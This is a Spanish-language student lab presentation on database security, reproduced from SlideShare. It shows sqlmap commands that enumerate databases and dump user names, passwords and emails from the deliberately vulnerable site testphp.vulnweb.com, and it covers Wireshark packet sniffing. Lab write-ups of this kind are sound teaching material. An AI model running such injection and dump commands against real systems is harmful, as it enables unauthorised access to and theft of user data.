SlideShare una empresa de Scribd logo
1 de 40
1. Ataque por inyección de 
código SQL. 
Descargue e instale la máquina virtual Virtualbox. 
- Descargue BadStore. 
- Descargue un programa para realizar ataque por inyección de código 
SQL sesugiere SQLMAP (http://sqlmap.org/) o Nmap 
(http://nmap.org/download.html. 
- Realizar un ataque a la base de datos de Badstore, con lo cual se debe 
obtener toda la información sobre la base de datos por ejemplo servidor 
de BD y versión, nombre de la base de datos, nombre de las tablas, 
información de las tablas, información de las columnas, etc. 
- Realizar una presentación o video sobre el ataque realizado.
Para determinar la vulnerabilidad del sitio que se nos dá, debemos 
colocar una comilla al lado del signo igual y actualizamos la página y 
esto nos debe indicar que tiene un error de sintaxis en la instrucción 
SQL, lo que lo hace vulnerable al ataque. 
Entonces copiamos la URL y lo copiamos en el comando del software 
sqlmap y ejecutamos presionando la tecla Enter 
 sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?artist=1 –bds 
Este comando nos permitirá conocer el nombre de la base de datos, 
como lo muestra la siguiente gráfica
Conociendo el nombre de la base de datos podemos ahora conocer las 
tablas que hacen parte de esa base de datos por medio del siguiente 
comando 
 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 
-D acuart –tables 
De este modo podremos conocer el nombre de las tablas, que hacen 
parte de esa base de datos
Una vez identificadas las tablas podremos conocer, las columnas de 
cada tabla, para ello debemos digitar el siguiente comando. 
 sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart - 
T users –columns 
Este comando nos mostrará, las columnas de la table Users, tal como 
lo muestra la siguiente gráfica.
Luego conocer las columnas de la tabla Users, debemos conocer el 
contenido de algunos de los campos, de dicha tabla. Por medio del 
siguiente comando podremos conocer el contenido del campo 
Uname, por medio del siguiente comando: 
sqlmap.py -u 
 http://testphp.vulnweb.com/listproducts.php?artist=1 -D 
acuart -T users -C uname –dump 
La siguiente gráfica nos muestra el contenido del campo uname
Así mismo para los campos restantes, tales como el contenido del 
campo name, por medio del siguiente comando. 
sqlmap.py -u 
 http://testphp.vulnweb.com/listproducts.php?artist=1 -D 
acuart -T users -C name –dump 
La siguiente gráfica muestra el contenido del campo Name, en la 
table acuart
Y podemos seguir conociendo más datos de la tabla usuarios, ahora 
lo vamos a hacer con el campo email
Por si quedan dudas extraemos la información de la cedula
2. Ataque con inyección de 
código SQL a sitio web 
Realizar un ataque a la base de datos del sitio 
http://testphp.vulnweb.com, con lo cual se debe obtener toda la 
información sobre la base de datos por ejemplo servidor de BD y 
versión, nombre de la base de datos, nombre de las tablas, información 
de las tablas, información de las columnas, etc.
Lo primero que debemos es definir de qué modo se realizará el ataque, 
ya sea por sistema operativo Linux o por Microsoft. 
Para este caso se relaizara con Microsoft 
Luego de definir el sistema para el ataque se procede a descargar un 
programa para realizar ataque por inyección de código SQL se sugiere 
SQLMAP ( http://sqlmap.org/) o Nmap 
(http://nmap.org/download.html) y el programa Pyntos 
Descarga de pyntos
Descarga de sqlmap
Una vez descargados se necesita que la carpeta comprimida de sqlmap sea 
instalada en el mismo lado o unidad como se observa en la imagen.
Ahora validamos que la pagina suministrada sea vulnerable a 
ataques, esto se hace agregando el apostrofo‘ al final de url. 
Url a validar: http://testphp.vulnweb.com 
Validación de vulnerabilidad de la Url
Una vez analizada y verificado el posible ataque a realizar, procedemos 
a ubicarnos en por línea de comandos en la carpeta sqlmap con el 
comando cd .., de la siguiente manera:
Y una vez ubicados en la carpeta sqlmap, comenzamos con la 
ejecución de comando. 
Ejecución de comando para averiguar nombre de la base de datos: 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -- 
dbs
Ejecución de comando: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db; para 
extraer información de la base de datos
Comando para extraer el nombre de las tablas de la base de datos: 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –D 
acuart --tables
Comando para extraer las columnas de la base de datos: sqlmap.py - 
u http://testphp.vulnweb.com/listproducts.php?cat=2 –T user -- 
columns
Comando para extraer datos de las columnas de la base de datos: 
sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D 
acuart -T user -C name –dump
Comando para validar password: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user 
-C pass –dump
Commando para verificar email: sqlmap.py -u 
http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T 
user -C email –dump
3. Ataque por Sniffing. 
Para esta práctica se debe descargar el software Wireshark desde el 
sitio web http://www.wireshark.org/download.html. La práctica 
consiste en la instalación del software Wireshark, luego con el 
software en ejecución tomar una observación prolongada, 
generando tráfico ftp, telnet, http, icmp, entre Una vez terminado el 
proceso de captura inicie el análisis de los paquetes e identifique 
que tipo de información se puede obtener a través de este tipo de 
ataque.
Se descarga el programa del página 
http://www.wireshark.org/download.html, verificación al abril el 
programa, damos clik, donde señala la fecha
A continuación encontramos un cuadro de diálogo, en el cual debemos 
seleccionar la tarjeta de red.
La tarjeta que se debe colocar a la escucha es la que recibe datos, luego 
de escogerla damos clik en Star, al instante se inicia con la captura de 
paquetes de datos de todos los hots conectados a la red.
Luego escribimos el protocolo que queremos filtrar, en el recuadro que 
indica la fecha 
Asi:
Cuando escribimos mal la dirección ip o el protocolo no presenta un 
error así:
Filtró desde el protocolo Ethernet
Filtró desde el protocolo TCP
Filtró desde el HTTP
Filtros por DNS
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING

Más contenido relacionado

La actualidad más candente

Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 
Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)
Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)
Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)Maztherprozh
 
Los servidores wamp
Los servidores wampLos servidores wamp
Los servidores wampgarciadebora
 
Manual php y_mysql
Manual php y_mysqlManual php y_mysql
Manual php y_mysqljohan reyes
 
Tutorial acerca del uso del sistema de calificacion
Tutorial acerca del uso del sistema de calificacionTutorial acerca del uso del sistema de calificacion
Tutorial acerca del uso del sistema de calificacionacmchaptercusco
 

La actualidad más candente (8)

Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)
Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)
Estructurabsicadeunprogramaendevc 140605195118-phpapp02(2)
 
Registros de la cpu
Registros de la cpuRegistros de la cpu
Registros de la cpu
 
Los servidores wamp
Los servidores wampLos servidores wamp
Los servidores wamp
 
Manual php y_mysql
Manual php y_mysqlManual php y_mysql
Manual php y_mysql
 
09practicafinal
09practicafinal09practicafinal
09practicafinal
 
Que es php
Que es phpQue es php
Que es php
 
Tutorial acerca del uso del sistema de calificacion
Tutorial acerca del uso del sistema de calificacionTutorial acerca del uso del sistema de calificacion
Tutorial acerca del uso del sistema de calificacion
 

Destacado (9)

Seguridad bd ataque spoofing
Seguridad bd ataque spoofingSeguridad bd ataque spoofing
Seguridad bd ataque spoofing
 
Seguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque TroyanoSeguridad Base de Datos Ataque Troyano
Seguridad Base de Datos Ataque Troyano
 
Seguridad BD Ataque Spoofing
Seguridad BD Ataque SpoofingSeguridad BD Ataque Spoofing
Seguridad BD Ataque Spoofing
 
Al instalar el iso de badstore
Al instalar el iso de badstoreAl instalar el iso de badstore
Al instalar el iso de badstore
 
Havij
HavijHavij
Havij
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Practica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datosPractica 1 seguridad en bases de datos
Practica 1 seguridad en bases de datos
 
Seguridad en Base de Datos
Seguridad en Base de DatosSeguridad en Base de Datos
Seguridad en Base de Datos
 
Función de Masa de Probabilidad mediante Fórmula
Función de Masa de Probabilidad mediante FórmulaFunción de Masa de Probabilidad mediante Fórmula
Función de Masa de Probabilidad mediante Fórmula
 

Similar a ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING

Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploitDaniel
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodriarodri7703
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxWaldir Nuñez Francia
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONTensor
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitationTensor
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapxavazquez
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebasTensor
 
Curso basicoseguridadweb slideshare10
Curso basicoseguridadweb slideshare10Curso basicoseguridadweb slideshare10
Curso basicoseguridadweb slideshare10tantascosasquenose
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografiaJosé Moreno
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertosarnoldvq16
 

Similar a ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING (20)

Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datos
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Present3
Present3Present3
Present3
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
Ataque win xp
Ataque win xpAtaque win xp
Ataque win xp
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Taller
TallerTaller
Taller
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
VULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATIONVULNERABILITY ASSESSMENT AND EXPLOITATION
VULNERABILITY ASSESSMENT AND EXPLOITATION
 
Vulnerability assessment and exploitation
Vulnerability assessment and exploitationVulnerability assessment and exploitation
Vulnerability assessment and exploitation
 
Zenmap
ZenmapZenmap
Zenmap
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Armitage pruebas
Armitage pruebasArmitage pruebas
Armitage pruebas
 
Curso basicoseguridadweb slideshare10
Curso basicoseguridadweb slideshare10Curso basicoseguridadweb slideshare10
Curso basicoseguridadweb slideshare10
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertos
 
Crack Distribuido Atabuido
Crack Distribuido AtabuidoCrack Distribuido Atabuido
Crack Distribuido Atabuido
 
Practica 11
Practica 11Practica 11
Practica 11
 

ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING

  • 1.
  • 2. 1. Ataque por inyección de código SQL. Descargue e instale la máquina virtual Virtualbox. - Descargue BadStore. - Descargue un programa para realizar ataque por inyección de código SQL sesugiere SQLMAP (http://sqlmap.org/) o Nmap (http://nmap.org/download.html. - Realizar un ataque a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc. - Realizar una presentación o video sobre el ataque realizado.
  • 3.
  • 4.
  • 5. Para determinar la vulnerabilidad del sitio que se nos dá, debemos colocar una comilla al lado del signo igual y actualizamos la página y esto nos debe indicar que tiene un error de sintaxis en la instrucción SQL, lo que lo hace vulnerable al ataque. Entonces copiamos la URL y lo copiamos en el comando del software sqlmap y ejecutamos presionando la tecla Enter  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 –bds Este comando nos permitirá conocer el nombre de la base de datos, como lo muestra la siguiente gráfica
  • 6.
  • 7. Conociendo el nombre de la base de datos podemos ahora conocer las tablas que hacen parte de esa base de datos por medio del siguiente comando  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart –tables De este modo podremos conocer el nombre de las tablas, que hacen parte de esa base de datos
  • 8.
  • 9. Una vez identificadas las tablas podremos conocer, las columnas de cada tabla, para ello debemos digitar el siguiente comando.  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart - T users –columns Este comando nos mostrará, las columnas de la table Users, tal como lo muestra la siguiente gráfica.
  • 10.
  • 11. Luego conocer las columnas de la tabla Users, debemos conocer el contenido de algunos de los campos, de dicha tabla. Por medio del siguiente comando podremos conocer el contenido del campo Uname, por medio del siguiente comando: sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C uname –dump La siguiente gráfica nos muestra el contenido del campo uname
  • 12.
  • 13. Así mismo para los campos restantes, tales como el contenido del campo name, por medio del siguiente comando. sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C name –dump La siguiente gráfica muestra el contenido del campo Name, en la table acuart
  • 14.
  • 15. Y podemos seguir conociendo más datos de la tabla usuarios, ahora lo vamos a hacer con el campo email
  • 16. Por si quedan dudas extraemos la información de la cedula
  • 17. 2. Ataque con inyección de código SQL a sitio web Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
  • 18. Lo primero que debemos es definir de qué modo se realizará el ataque, ya sea por sistema operativo Linux o por Microsoft. Para este caso se relaizara con Microsoft Luego de definir el sistema para el ataque se procede a descargar un programa para realizar ataque por inyección de código SQL se sugiere SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el programa Pyntos Descarga de pyntos
  • 20. Una vez descargados se necesita que la carpeta comprimida de sqlmap sea instalada en el mismo lado o unidad como se observa en la imagen.
  • 21. Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando el apostrofo‘ al final de url. Url a validar: http://testphp.vulnweb.com Validación de vulnerabilidad de la Url
  • 22. Una vez analizada y verificado el posible ataque a realizar, procedemos a ubicarnos en por línea de comandos en la carpeta sqlmap con el comando cd .., de la siguiente manera:
  • 23. Y una vez ubicados en la carpeta sqlmap, comenzamos con la ejecución de comando. Ejecución de comando para averiguar nombre de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -- dbs
  • 24. Ejecución de comando: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db; para extraer información de la base de datos
  • 25. Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables
  • 26. Comando para extraer las columnas de la base de datos: sqlmap.py - u http://testphp.vulnweb.com/listproducts.php?cat=2 –T user -- columns
  • 27. Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump
  • 28. Comando para validar password: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump
  • 29. Commando para verificar email: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C email –dump
  • 30. 3. Ataque por Sniffing. Para esta práctica se debe descargar el software Wireshark desde el sitio web http://www.wireshark.org/download.html. La práctica consiste en la instalación del software Wireshark, luego con el software en ejecución tomar una observación prolongada, generando tráfico ftp, telnet, http, icmp, entre Una vez terminado el proceso de captura inicie el análisis de los paquetes e identifique que tipo de información se puede obtener a través de este tipo de ataque.
  • 31. Se descarga el programa del página http://www.wireshark.org/download.html, verificación al abril el programa, damos clik, donde señala la fecha
  • 32. A continuación encontramos un cuadro de diálogo, en el cual debemos seleccionar la tarjeta de red.
  • 33. La tarjeta que se debe colocar a la escucha es la que recibe datos, luego de escogerla damos clik en Star, al instante se inicia con la captura de paquetes de datos de todos los hots conectados a la red.
  • 34. Luego escribimos el protocolo que queremos filtrar, en el recuadro que indica la fecha Asi:
  • 35. Cuando escribimos mal la dirección ip o el protocolo no presenta un error así:
  • 36. Filtró desde el protocolo Ethernet
  • 37. Filtró desde el protocolo TCP